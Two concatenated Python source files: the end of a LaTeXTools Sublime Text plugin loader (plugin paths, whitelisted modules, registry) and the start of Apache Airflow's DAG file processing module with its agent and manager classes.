internal._REGISTERED_PATHS_TO_LOAD.append((path, glob))
# if we are called before `plugin_loaded`
if internal._REGISTRY is None:
return
previous_plugins = set(internal._REGISTRY.keys())
with _latextools_module_hack():
if not os.path.exists(path):
return
if os.path.isfile(path):
plugin_dir = os.path.dirname(path)
sys.path.insert(0, plugin_dir)
_load_plugin(os.path.basename(path), plugin_dir)
sys.path.pop(0)
else:
for file in _glob.iglob(os.path.join(path, glob)):
plugin_dir = os.path.dirname(file)
sys.path.insert(0, plugin_dir)
_load_plugin(os.path.basename(file), plugin_dir)
sys.path.pop(0)
print('Loaded LaTeXTools plugins {0} from path {1}'.format(
list(set(internal._REGISTRY.keys()) - previous_plugins),
path))
def add_whitelist_module(name, module=None):
'''
API function to ensure that a certain module is made available to any
plugins.
`name` should be the name of the module as it will be imported in a plugin
`module`, if specified, should be either an actual module object or a
callable that returns the actual module object.
The `module` mechanism is provided to allow for the import of modules that
might otherwise be unavailable or available in sys.modules only by a
different name. Standard LaTeXTools modules should provide a name only.
Note that this function *must* be called before add_plugin_path.
'''
for i, (_name, _module) in enumerate(internal._WHITELIST_ADDED):
if _name == name:
if _module == module:
return
internal._WHITELIST_ADDED[i] = (_name, module)
return
internal._WHITELIST_ADDED.append((name, module))
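# A minimal usage sketch (module names are illustrative). Whitelisted modules
# must be registered before plugin paths are added:
#
#   add_whitelist_module('latextools_utils')
#   add_whitelist_module('utils_alias', sys.modules.get('latextools_utils'))
#   add_plugin_path(os.path.join(sublime.packages_path(), 'User', 'latextools_plugins'))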
def get_plugin(name):
'''
This is intended to be the main entry-point used by consumers (not
implementors) of plugins, to find any plugins that have registered
themselves by name.
If a plugin cannot be found, a NoSuchPluginException will be thrown. Please
try to provide the user with any helpful information.
Use case:
Provide the user with the ability to load a plugin by a memorable name,
e.g., in a settings file.
For example, 'biblatex' will get the plugin named 'BibLaTeX', etc.
'''
if internal._REGISTRY is None:
raise NoSuchPluginException(
('Could not load plugin {0} because the registry either hasn\'t '
'been loaded or has just been unloaded.').format(name)
)
return internal._REGISTRY[name]
def get_plugins_by_type(cls):
if internal._REGISTRY is None:
raise NoSuchPluginException(
'No plugins could be loaded because the registry either hasn\'t '
'been loaded or has been unloaded'
)
plugins = [plugin for _, plugin in internal._REGISTRY.items()
if issubclass(plugin, cls)]
return plugins
# -- Private API --#
if sys.version_info < (3, 0):
exec("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
import imp
def _load_module(module_name, filename, *paths):
name, ext = os.path.splitext(filename)
if ext in ('.py', ''):
f, path, description = imp.find_module(name, list(paths))
try:
module = imp.load_module(module_name, f, path, description)
finally:
if f:
f.close()
else:
module = None
exc_info = None
for path in paths:
p = os.path.normpath(os.path.join(path, filename))
if os.path.exists(p):
try:
                        module = imp.load_source(module_name, p)
except ImportError:
exc_info = sys.exc_info()
if not module and exc_info:
reraise(*exc_info)
return module
strbase = basestring
FileNotFoundError = IOError
else:
from importlib.machinery import PathFinder, SourceFileLoader
from imp import reload
# WARNING:
# imp module is deprecated in 3.x, unfortunately, importlib does not seem
# to have a stable API, as in 3.4, `find_module` is deprecated in favour of
# `find_spec` and discussions of how best to provide access to the import
# internals seem to be on-going
def _load_module(module_name, filename, *paths):
name, ext = os.path.splitext(filename)
if ext in ('.py', ''):
loader = PathFinder.find_module(name, path=paths)
if loader is None:
loader = PathFinder.find_module(name)
if loader is None:
raise ImportError(
'Could not find module {} on path {} or sys.path'.format(
name, paths))
else:
loader = None
for path in paths:
p = os.path.normpath(os.path.join(path, filename))
if os.path.exists(p):
loader = SourceFileLoader(module_name, p)
if loader is None:
raise ImportError(
'Could not find module {} on path {}'.format(name, paths))
loader.name = module_name
return loader.load_module()
strbase = str
if sublime.version() < '3000':
import latextools_plugin_internal as internal
def _get_sublime_module_name(_, module):
return module
else:
from . import latextools_plugin_internal as internal
def _get_sublime_module_name(directory, module):
return '{0}.{1}'.format(os.path.basename(directory), module)
class LaTeXToolsPluginRegistry(MutableMapping):
'''
Registry used internally to store references to plugins to be retrieved
by plugin consumers.
'''
def __init__(self):
self._registry = {}
def __getitem__(self, key):
try:
return self._registry[key]
except KeyError:
raise NoSuchPluginException(
'Plugin {0} does not exist. Please ensure that the plugin is '
'configured as documented'.format(key)
)
def __setitem__(self, key, value):
if not isinstance(value, internal.LaTeXToolsPluginMeta):
raise InvalidPluginException(value)
self._registry[key] = value
def __delitem__(self, key):
del self._registry[key]
def __iter__(self):
return iter(self._registry)
def __len__(self):
return len(self._registry)
def __str__(self):
return str(self._registry)
_classname_to_internal_name = internal._classname_to_internal_name
def _get_plugin_paths():
plugin_paths = get_setting('plugin_paths', [])
return plugin_paths
def _load_plugin(filename, *paths):
name, ext = os.path.splitext(filename)
# hopefully a unique-enough module name!
if not ext or ext == '.py':
module_name = '{0}{1}'.format(_MODULE_PREFIX, name)
else:
module_name = '{0}{1}_{2}'.format(_MODULE_PREFIX, name, ext[1:])
if module_name in sys.modules:
try:
return sys.modules[module_name]
except ImportError:
# On ST2, this appears to be triggered on the initial reload and
# fails, so instead of reloading just continue to run the loading
# code
pass
except FileNotFoundError:
# A previous plugin has been moved or removed, so just reload it
pass
try:
return _load_module(module_name, filename, *paths)
except:
print('Could not load module {0} using path {1}.'.format(name, paths))
traceback.print_exc()
return None
def _load_plugins():
def _resolve_plugin_path(path):
if not os.path.isabs(path):
p = os.path.normpath(
os.path.join(sublime.packages_path(), 'User', path))
if not os.path.exists(p):
p = os.path.normpath(
os.path.join(sublime.packages_path(), 'LaTeXTools', path))
return p
return path
for path in _get_plugin_paths():
if type(path) == strbase:
add_plugin_path(_resolve_plugin_path(path))
else:
try:
# assume path is a tuple of [<path>, <glob>]
add_plugin_path(_resolve_plugin_path(path[0]), path[1])
except:
print(
'An error occurred while trying to add the plugin '
'path {0}'.format(path))
traceback.print_exc()
@contextmanager
def _latextools_module_hack():
'''
Context manager to ensure sys.modules has certain white-listed modules,
    most especially latextools_plugin. This exposes some of the modules in
LaTeXTools to plugins. It is intended primarily to expose library-esque
functionality, such as the getTeXRoot module, but can be configured by
the user as-needed.
'''
# add any white-listed plugins to sys.modules under their own name
plugins_whitelist = get_setting(
'plugins_whitelist',
['external', 'getTeXRoot', 'latextools_utils']
)
    # always include latextools_plugin
plugins_whitelist.append('latextools_plugin')
overwritten_modules = {}
whitelist = [(name, None) for name in plugins_whitelist]
whitelist.extend(internal._WHITELIST_ADDED)
# put the directory containing this file on the sys.path
__dir__ = os.path.dirname(__file__)
    # handles ST2's relative directory
if __dir__ == '.':
__dir__ = os.path.join(sublime.packages_path(), 'LaTeXTools')
# insert the LaTeXTools directory on the path
sys.path.insert(0, __dir__)
for name, module in whitelist:
if callable(module):
module = module()
if name in sys.modules:
overwritten_modules[name] = sys.modules[name]
# attempting to autoload module
if module is None:
# if the module has already been loaded by ST, we just use that
latextools_module_name = _get_sublime_module_name(__dir__, name)
if latextools_module_name in sys.modules:
sys.modules[name] = sys.modules[latextools_module_name]
else:
try:
sys.modules[name] = _load_module(name, name, __dir__)
except ImportError:
print(
'An error occurred while trying to load white-listed '
'module {0}'.format(name)
)
traceback.print_exc()
else:
sys.modules[name] = module
# remove the LaTeXTools directory from the path
sys.path.pop(0)
yield
# restore any temporarily overwritten modules and clear our loaded modules
for module in plugins_whitelist:
if _get_sublime_module_name(__dir__, module) != module:
del sys.modules[module]
if module in overwritten_modules:
sys.modules[module] = overwritten_modules[module]
# load plugins when the Sublime API is available, just in case...
def plugin_loaded():
t = threading.Thread(target=_plugin_loaded)
t.daemon = True
t.start()
def _plugin_loaded():
internal._REGISTRY = LaTeXToolsPluginRegistry()
print('Loading LaTeXTools plugins...')
for name, cls in internal._REGISTERED_CLASSES_TO_LOAD:
internal._REGISTRY[name] = cls
_load_plugins()
for path, glob in internal._REGISTERED_PATHS_TO_LOAD:
add_plugin_path(path, glob)
# ensure plugin_loaded() called on ST2
if sublime.version() < '3000' and internal._REGISTRY is None:
plugin_loaded()
|
dag_processing.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Processes DAGs."""
import enum
import importlib
import logging
import multiprocessing
import os
import signal
import sys
import time
from abc import ABCMeta, abstractmethod
from datetime import datetime, timedelta
from importlib import import_module
from typing import Any, Callable, Dict, KeysView, List, NamedTuple, Optional, Tuple
import psutil
from setproctitle import setproctitle # pylint: disable=no-name-in-module
from sqlalchemy import or_
from tabulate import tabulate
import airflow.models
from airflow.configuration import conf
from airflow.dag.base_dag import BaseDag, BaseDagBag
from airflow.exceptions import AirflowException
from airflow.models import Connection, errors
from airflow.models.taskinstance import SimpleTaskInstance
from airflow.settings import STORE_SERIALIZED_DAGS
from airflow.stats import Stats
from airflow.utils import timezone
from airflow.utils.db import provide_session
from airflow.utils.file import list_py_file_paths
from airflow.utils.helpers import reap_process_group
from airflow.utils.log.logging_mixin import LoggingMixin
from airflow.utils.state import State
class SimpleDag(BaseDag):
"""
A simplified representation of a DAG that contains all attributes
required for instantiating and scheduling its associated tasks.
:param dag: the DAG
:type dag: airflow.models.DAG
:param pickle_id: ID associated with the pickled version of this DAG.
:type pickle_id: unicode
"""
def __init__(self, dag, pickle_id: Optional[str] = None):
self._dag_id: str = dag.dag_id
self._task_ids: List[str] = [task.task_id for task in dag.tasks]
self._full_filepath: str = dag.full_filepath
self._is_paused: bool = dag.is_paused
self._concurrency: int = dag.concurrency
self._pickle_id: Optional[str] = pickle_id
self._task_special_args: Dict[str, Any] = {}
for task in dag.tasks:
special_args = {}
if task.task_concurrency is not None:
special_args['task_concurrency'] = task.task_concurrency
if special_args:
self._task_special_args[task.task_id] = special_args
@property
def dag_id(self) -> str:
"""
:return: the DAG ID
:rtype: unicode
"""
return self._dag_id
@property
def task_ids(self) -> List[str]:
"""
:return: A list of task IDs that are in this DAG
:rtype: list[unicode]
"""
return self._task_ids
@property
def full_filepath(self) -> str:
"""
:return: The absolute path to the file that contains this DAG's definition
:rtype: unicode
"""
return self._full_filepath
@property
def concurrency(self) -> int:
"""
:return: maximum number of tasks that can run simultaneously from this DAG
:rtype: int
"""
return self._concurrency
@property
def is_paused(self) -> bool:
"""
:return: whether this DAG is paused or not
:rtype: bool
"""
return self._is_paused
@property
def pickle_id(self) -> Optional[str]:
"""
:return: The pickle ID for this DAG, if it has one. Otherwise None.
:rtype: unicode
"""
return self._pickle_id
@property
def task_special_args(self) -> Dict[str, Any]:
"""Special arguments of the task."""
return self._task_special_args
def get_task_special_arg(self, task_id: str, special_arg_name: str):
"""Retrieve special arguments of the task."""
if task_id in self._task_special_args and special_arg_name in self._task_special_args[task_id]:
return self._task_special_args[task_id][special_arg_name]
else:
return None
class SimpleDagBag(BaseDagBag):
"""
A collection of SimpleDag objects with some convenience methods.
"""
def __init__(self, simple_dags: List[SimpleDag]):
"""
Constructor.
:param simple_dags: SimpleDag objects that should be in this
        :type simple_dags: list[airflow.utils.dag_processing.SimpleDag]
"""
self.simple_dags = simple_dags
self.dag_id_to_simple_dag: Dict[str, SimpleDag] = {}
for simple_dag in simple_dags:
self.dag_id_to_simple_dag[simple_dag.dag_id] = simple_dag
@property
def dag_ids(self) -> KeysView[str]:
"""
:return: IDs of all the DAGs in this
:rtype: list[unicode]
"""
return self.dag_id_to_simple_dag.keys()
def get_dag(self, dag_id: str) -> SimpleDag:
"""
:param dag_id: DAG ID
:type dag_id: unicode
:return: if the given DAG ID exists in the bag, return the BaseDag
corresponding to that ID. Otherwise, throw an Exception
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if dag_id not in self.dag_id_to_simple_dag:
raise AirflowException("Unknown DAG ID {}".format(dag_id))
return self.dag_id_to_simple_dag[dag_id]
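# Illustrative sketch (the `dag` argument is assumed to be an already-parsed
# airflow.models.DAG): wrap it in a SimpleDag, collect it in a SimpleDagBag and
# look it up again by its id.
def _example_simple_dag_bag(dag):
    simple_dag = SimpleDag(dag)
    bag = SimpleDagBag([simple_dag])
    return bag.get_dag(simple_dag.dag_id).task_ids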
class AbstractDagFileProcessorProcess(metaclass=ABCMeta):
"""
Processes a DAG file. See SchedulerJob.process_file() for more details.
"""
@abstractmethod
def start(self):
"""
Launch the process to process the file
"""
raise NotImplementedError()
@abstractmethod
def terminate(self, sigkill: bool = False):
"""
Terminate (and then kill) the process launched to process the file
"""
raise NotImplementedError()
@property
@abstractmethod
def pid(self) -> int:
"""
:return: the PID of the process launched to process the given file
"""
raise NotImplementedError()
@property
@abstractmethod
def exit_code(self) -> int:
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
raise NotImplementedError()
@property
@abstractmethod
def done(self) -> bool:
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
raise NotImplementedError()
@property
@abstractmethod
def result(self) -> Tuple[List[SimpleDag], int]:
"""
A list of simple dags found, and the number of import errors
:return: result of running SchedulerJob.process_file()
:rtype: tuple[list[airflow.utils.dag_processing.SimpleDag], int]
"""
raise NotImplementedError()
@property
@abstractmethod
def start_time(self):
"""
:return: When this started to process the file
:rtype: datetime
"""
raise NotImplementedError()
@property
@abstractmethod
def file_path(self):
"""
:return: the path to the file that this is processing
:rtype: unicode
"""
raise NotImplementedError()
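# A minimal, synchronous stand-in for the interface above (useful e.g. in
# tests; this class is an assumption for illustration, not part of Airflow).
class _ExampleInlineProcessorStub(AbstractDagFileProcessorProcess):
    """Pretends the given file was already processed and found nothing."""
    def __init__(self, file_path):
        self._file_path = file_path
        self._start_time = timezone.utcnow()
    def start(self):
        pass  # nothing to launch, the "work" is already done
    def terminate(self, sigkill: bool = False):
        pass
    @property
    def pid(self) -> int:
        return os.getpid()
    @property
    def exit_code(self) -> int:
        return 0
    @property
    def done(self) -> bool:
        return True
    @property
    def result(self) -> Tuple[List[SimpleDag], int]:
        return [], 0  # no SimpleDags found, no import errors
    @property
    def start_time(self):
        return self._start_time
    @property
    def file_path(self):
        return self._file_path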
class DagParsingStat(NamedTuple):
"""Information on processing progress"""
file_paths: List[str]
done: bool
all_files_processed: bool
class DagFileStat(NamedTuple):
"""Information about single processing of one file"""
num_dags: int
import_errors: int
last_finish_time: datetime
last_duration: float
run_count: int
class DagParsingSignal(enum.Enum):
"""All signals sent to parser."""
AGENT_HEARTBEAT = 'agent_heartbeat'
TERMINATE_MANAGER = 'terminate_manager'
END_MANAGER = 'end_manager'
class DagFileProcessorAgent(LoggingMixin):
"""
    Agent for DAG file processing. It is responsible for all DAG parsing
    related jobs in the scheduler process. Mainly it spins up a
    DagFileProcessorManager in a subprocess, collects DAG parsing results from
    it, and exchanges signals and DAG parsing stats with it.
This class runs in the main `airflow scheduler` process.
"""
def __init__(self,
dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
async_mode):
"""
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path, log_file_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param async_mode: Whether to start agent in async mode
:type async_mode: bool
"""
self._file_paths = file_paths
self._file_path_queue = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._processor_timeout = processor_timeout
self._async_mode = async_mode
# Map from file path to the processor
self._processors = {}
# Pipe for communicating signals
self._process = None
self._done = False
# Initialized as true so we do not deactivate w/o any actual DAG parsing.
self._all_files_processed = True
self._parent_signal_conn = None
self._collected_dag_buffer = []
def start(self):
"""
Launch DagFileProcessorManager processor and start DAG parsing loop in manager.
"""
self._parent_signal_conn, child_signal_conn = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_processor_manager,
args=(
self._dag_directory,
self._file_paths,
self._max_runs,
self._processor_factory,
self._processor_timeout,
child_signal_conn,
self._async_mode,
)
)
self._process.start()
self.log.info("Launched DagFileProcessorManager with pid: %s", self._process.pid)
def heartbeat(self):
"""
        Should only be used when the DAG file processor manager was launched in sync mode.
        Send an agent heartbeat signal to the manager, requesting that it run one
        processing "loop".
        Call wait_until_finished to ensure that any launched processors have
        finished before continuing.
"""
if not self._process.is_alive():
return
try:
self._parent_signal_conn.send(DagParsingSignal.AGENT_HEARTBEAT)
except ConnectionError:
            # If the manager died because of an error, it will be noticed and
            # restarted when harvest_simple_dags calls _heartbeat_manager.
pass
def wait_until_finished(self):
"""Waits until DAG parsing is finished."""
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except EOFError:
break
self._process_message(result)
if isinstance(result, DagParsingStat):
# In sync mode we don't send this message from the Manager
# until all the running processors have finished
return
@staticmethod
def _run_processor_manager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode):
# Make this process start as a new process group - that makes it easy
# to kill all sub-process of this at the OS-level, rather than having
# to iterate the child processes
os.setpgid(0, 0)
setproctitle("airflow scheduler -- DagFileProcessorManager")
        # Reload configurations and settings to avoid collision with the parent
        # process: this process may need custom configurations that cannot be
        # shared (e.g. a RotatingFileHandler), and connections can be corrupted
        # if we do not recreate the SQLAlchemy connection pool.
os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER'] = 'True'
os.environ['AIRFLOW__CORE__COLORED_CONSOLE_LOG'] = 'False'
# Replicating the behavior of how logging module was loaded
# in logging_config.py
importlib.reload(import_module(airflow.settings.LOGGING_CLASS_PATH.rsplit('.', 1)[0]))
importlib.reload(airflow.settings)
airflow.settings.initialize()
del os.environ['CONFIG_PROCESSOR_MANAGER_LOGGER']
processor_manager = DagFileProcessorManager(dag_directory,
file_paths,
max_runs,
processor_factory,
processor_timeout,
signal_conn,
async_mode)
processor_manager.start()
def harvest_simple_dags(self):
"""
Harvest DAG parsing results from result queue and sync metadata from stat queue.
:return: List of parsing result in SimpleDag format.
"""
# Receive any pending messages before checking if the process has exited.
while self._parent_signal_conn.poll():
try:
result = self._parent_signal_conn.recv()
except (EOFError, ConnectionError):
break
self._process_message(result)
simple_dags = self._collected_dag_buffer
self._collected_dag_buffer = []
# If it died unexpectedly restart the manager process
self._heartbeat_manager()
return simple_dags
def _process_message(self, message):
self.log.debug("Received message of type %s", type(message).__name__)
if isinstance(message, DagParsingStat):
self._sync_metadata(message)
else:
self._collected_dag_buffer.append(message)
def _heartbeat_manager(self):
"""
Heartbeat DAG file processor and restart it if we are not done.
"""
if self._process and not self._process.is_alive():
self._process.join(timeout=0)
if not self.done:
self.log.warning(
"DagFileProcessorManager (PID=%d) exited with exit code %d - re-launching",
self._process.pid, self._process.exitcode
)
self.start()
def _sync_metadata(self, stat):
"""
Sync metadata from stat queue and only keep the latest stat.
"""
self._file_paths = stat.file_paths
self._done = stat.done
self._all_files_processed = stat.all_files_processed
# pylint: disable=missing-docstring
@property
def file_paths(self):
return self._file_paths
@property
def done(self):
return self._done
@property
def all_files_processed(self):
return self._all_files_processed
def terminate(self):
"""
Send termination signal to DAG parsing processor manager
and expect it to terminate all DAG file processors.
"""
if self._process and self._process.is_alive():
self.log.info("Sending termination message to manager.")
try:
self._parent_signal_conn.send(DagParsingSignal.TERMINATE_MANAGER)
except ConnectionError:
pass
def end(self):
"""
Terminate (and then kill) the manager process launched.
:return:
"""
if not self._process:
self.log.warning('Ending without manager process.')
return
reap_process_group(self._process.pid, log=self.log)
self._parent_signal_conn.close()
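# Sketch of how a scheduler-like caller might drive the agent in sync mode
# (dag_directory, file_paths and processor_factory are assumptions here; see
# SchedulerJob for the real wiring).
def _example_drive_agent(dag_directory, file_paths, processor_factory):
    agent = DagFileProcessorAgent(dag_directory,
                                  file_paths,
                                  max_runs=1,
                                  processor_factory=processor_factory,
                                  processor_timeout=timedelta(minutes=5),
                                  async_mode=False)
    agent.start()
    agent.heartbeat()            # ask the manager to run one parsing "loop"
    agent.wait_until_finished()  # block until that loop reports back
    simple_dags = agent.harvest_simple_dags()
    agent.end()
    return simple_dags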
class DagFileProcessorManager(LoggingMixin): # pylint: disable=too-many-instance-attributes
"""
    Given a list of DAG definition files, this kicks off several processors
    in parallel to process them and sends the results back over the supplied
    connection for DagFileProcessorAgent to harvest. The parallelism is limited and as the
processors finish, more are launched. The files are processed over and
over again, but no more often than the specified interval.
:param dag_directory: Directory where DAG definitions are kept. All
files in file_paths should be under this directory
:type dag_directory: unicode
:param file_paths: list of file paths that contain DAG definitions
:type file_paths: list[unicode]
:param max_runs: The number of times to parse and schedule each file. -1
for unlimited.
:type max_runs: int
:param processor_factory: function that creates processors for DAG
definition files. Arguments are (dag_definition_path)
:type processor_factory: (unicode, unicode, list) -> (AbstractDagFileProcessorProcess)
:param processor_timeout: How long to wait before timing out a DAG file processor
:type processor_timeout: timedelta
:param signal_conn: connection to communicate signal with processor agent.
:type signal_conn: airflow.models.connection.Connection
:param async_mode: whether to start the manager in async mode
:type async_mode: bool
"""
def __init__(self,
dag_directory: str,
file_paths: List[str],
max_runs: int,
processor_factory: Callable[[str, List[Any]], AbstractDagFileProcessorProcess],
processor_timeout: timedelta,
signal_conn: Connection,
async_mode: bool = True):
self._file_paths = file_paths
self._file_path_queue: List[str] = []
self._dag_directory = dag_directory
self._max_runs = max_runs
self._processor_factory = processor_factory
self._signal_conn = signal_conn
self._async_mode = async_mode
self._parsing_start_time: Optional[datetime] = None
self._parallelism = conf.getint('scheduler', 'max_threads')
if 'sqlite' in conf.get('core', 'sql_alchemy_conn') and self._parallelism > 1:
self.log.warning(
"Because we cannot use more than 1 thread (max_threads = "
"%d ) when using sqlite. So we set parallelism to 1.", self._parallelism
)
self._parallelism = 1
# Parse and schedule each file no faster than this interval.
self._file_process_interval = conf.getint('scheduler',
'min_file_process_interval')
# How often to print out DAG file processing stats to the log. Default to
# 30 seconds.
self.print_stats_interval = conf.getint('scheduler',
'print_stats_interval')
        # How many seconds to wait for tasks to heartbeat before marking them as zombies.
self._zombie_threshold_secs = (
conf.getint('scheduler', 'scheduler_zombie_task_threshold'))
# Map from file path to the processor
self._processors: Dict[str, AbstractDagFileProcessorProcess] = {}
self._heartbeat_count = 0
# Map from file path to stats about the file
self._file_stats: Dict[str, DagFileStat] = {}
self._last_zombie_query_time = None
# Last time that the DAG dir was traversed to look for files
self.last_dag_dir_refresh_time = timezone.utcnow()
# Last time stats were printed
self.last_stat_print_time = timezone.datetime(2000, 1, 1)
# TODO: Remove magic number
self._zombie_query_interval = 10
self._zombies: List[SimpleTaskInstance] = []
# How long to wait before timing out a process to parse a DAG file
self._processor_timeout = processor_timeout
# How often to scan the DAGs directory for new files. Default to 5 minutes.
self.dag_dir_list_interval = conf.getint('scheduler',
'dag_dir_list_interval')
self._log = logging.getLogger('airflow.processor_manager')
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame): # pylint: disable=unused-argument
"""
Helper method to clean up DAG file processors to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
self.terminate()
self.end()
self.log.debug("Finished terminating DAG processors.")
sys.exit(os.EX_OK)
def start(self):
"""
Use multiple processes to parse and generate tasks for the
DAGs in parallel. By processing them in separate processes,
we can get parallelism and isolation from potentially harmful
user code.
"""
# Start a new process group
os.setpgid(0, 0)
self.log.info("Processing files using up to %s processes at a time ", self._parallelism)
self.log.info("Process each file at most once every %s seconds", self._file_process_interval)
self.log.info(
"Checking for new files in %s every %s seconds", self._dag_directory, self.dag_dir_list_interval
)
# In sync mode we want timeout=None -- wait forever until a message is received
poll_time = None # type: Optional[float]
if self._async_mode:
poll_time = 0.0
self.log.debug("Starting DagFileProcessorManager in async mode")
else:
poll_time = None
self.log.debug("Starting DagFileProcessorManager in sync mode")
# Used to track how long it takes us to get once around every file in the DAG folder.
self._parsing_start_time = timezone.utcnow()
while True:
loop_start_time = time.time()
if self._signal_conn.poll(poll_time):
agent_signal = self._signal_conn.recv()
self.log.debug("Recived %s singal from DagFileProcessorAgent", agent_signal)
if agent_signal == DagParsingSignal.TERMINATE_MANAGER:
self.terminate()
break
elif agent_signal == DagParsingSignal.END_MANAGER:
self.end()
sys.exit(os.EX_OK)
elif agent_signal == DagParsingSignal.AGENT_HEARTBEAT:
# continue the loop to parse dags
pass
elif not self._async_mode:
# In "sync" mode we don't want to parse the DAGs until we
# are told to (as that would open another connection to the
# SQLite DB which isn't a good practice
continue
self._refresh_dag_dir()
self._find_zombies() # pylint: disable=no-value-for-parameter
simple_dags = self.heartbeat()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
if not self._async_mode:
self.log.debug(
"Waiting for processors to finish since we're using sqlite")
# Wait until the running DAG processors are finished before
# sending a DagParsingStat message back. This means the Agent
# can tell we've got to the end of this iteration when it sees
# this type of message
self.wait_until_finished()
# Collect anything else that has finished, but don't kick off any more processors
simple_dags = self.collect_results()
for simple_dag in simple_dags:
self._signal_conn.send(simple_dag)
self._print_stat()
all_files_processed = all(self.get_last_finish_time(x) is not None for x in self.file_paths)
max_runs_reached = self.max_runs_reached()
dag_parsing_stat = DagParsingStat(self._file_paths,
max_runs_reached,
all_files_processed,
)
self._signal_conn.send(dag_parsing_stat)
if max_runs_reached:
self.log.info("Exiting dag parsing loop as all files "
"have been processed %s times", self._max_runs)
break
if self._async_mode:
loop_duration = time.time() - loop_start_time
if loop_duration < 1:
poll_time = 1 - loop_duration
else:
poll_time = 0.0
def _refresh_dag_dir(self):
"""
Refresh file paths from dag dir if we haven't done it for too long.
"""
now = timezone.utcnow()
elapsed_time_since_refresh = (now - self.last_dag_dir_refresh_time).total_seconds()
if elapsed_time_since_refresh > self.dag_dir_list_interval:
# Build up a list of Python files that could contain DAGs
self.log.info("Searching for files in %s", self._dag_directory)
self._file_paths = list_py_file_paths(self._dag_directory)
self.last_dag_dir_refresh_time = now
self.log.info("There are %s files in %s", len(self._file_paths), self._dag_directory)
self.set_file_paths(self._file_paths)
# noinspection PyBroadException
try:
self.log.debug("Removing old import errors")
self.clear_nonexistent_import_errors() # pylint: disable=no-value-for-parameter
except Exception: # pylint: disable=broad-except
self.log.exception("Error removing old import errors")
if STORE_SERIALIZED_DAGS:
from airflow.models.serialized_dag import SerializedDagModel
from airflow.models.dag import DagModel
SerializedDagModel.remove_deleted_dags(self._file_paths)
DagModel.deactivate_deleted_dags(self._file_paths)
def _print_stat(self):
"""
Occasionally print out stats about how fast the files are getting processed
"""
if (timezone.utcnow() - self.last_stat_print_time).total_seconds() > self.print_stats_interval:
if self._file_paths:
self._log_file_processing_stats(self._file_paths)
self.last_stat_print_time = timezone.utcnow()
@provide_session
def clear_nonexistent_import_errors(self, session):
"""
Clears import errors for files that no longer exist.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
"""
query = session.query(errors.ImportError)
if self._file_paths:
query = query.filter(
~errors.ImportError.filename.in_(self._file_paths)
)
query.delete(synchronize_session='fetch')
session.commit()
def _log_file_processing_stats(self, known_file_paths):
"""
Print out stats about how files are getting processed.
:param known_file_paths: a list of file paths that may contain Airflow
DAG definitions
:type known_file_paths: list[unicode]
:return: None
"""
# File Path: Path to the file containing the DAG definition
# PID: PID associated with the process that's processing the file. May
# be empty.
# Runtime: If the process is currently running, how long it's been
# running for in seconds.
# Last Runtime: If the process ran before, how long did it take to
# finish in seconds
# Last Run: When the file finished processing in the previous run.
headers = ["File Path",
"PID",
"Runtime",
"# DAGs",
"# Errors",
"Last Runtime",
"Last Run"]
rows = []
now = timezone.utcnow()
for file_path in known_file_paths:
last_runtime = self.get_last_runtime(file_path)
num_dags = self.get_last_dag_count(file_path)
num_errors = self.get_last_error_count(file_path)
file_name = os.path.basename(file_path)
file_name = os.path.splitext(file_name)[0].replace(os.sep, '.')
processor_pid = self.get_pid(file_path)
processor_start_time = self.get_start_time(file_path)
runtime = ((now - processor_start_time) if processor_start_time else None)
last_run = self.get_last_finish_time(file_path)
if last_run:
seconds_ago = (now - last_run).total_seconds()
Stats.gauge('dag_processing.last_run.seconds_ago.{}'.format(file_name), seconds_ago)
if runtime:
Stats.timing('dag_processing.last_duration.{}'.format(file_name), runtime)
# TODO: Remove before Airflow 2.0
Stats.timing('dag_processing.last_runtime.{}'.format(file_name), runtime)
rows.append((file_path,
processor_pid,
runtime,
num_dags,
num_errors,
last_runtime,
last_run))
# Sort by longest last runtime. (Can't sort None values in python3)
        rows = sorted(rows, key=lambda x: x[5] or 0.0)
formatted_rows = []
for file_path, pid, runtime, num_dags, num_errors, last_runtime, last_run in rows:
formatted_rows.append((file_path,
pid,
"{:.2f}s".format(runtime.total_seconds()) if runtime else None,
num_dags,
num_errors,
"{:.2f}s".format(last_runtime) if last_runtime else None,
last_run.strftime("%Y-%m-%dT%H:%M:%S") if last_run else None
))
log_str = ("\n" +
"=" * 80 +
"\n" +
"DAG File Processing Stats\n\n" +
tabulate(formatted_rows, headers=headers) +
"\n" +
"=" * 80)
self.log.info(log_str)
def get_pid(self, file_path):
"""
:param file_path: the path to the file that's being processed
:type file_path: unicode
:return: the PID of the process processing the given file or None if
the specified file is not being processed
:rtype: int
"""
if file_path in self._processors:
return self._processors[file_path].pid
return None
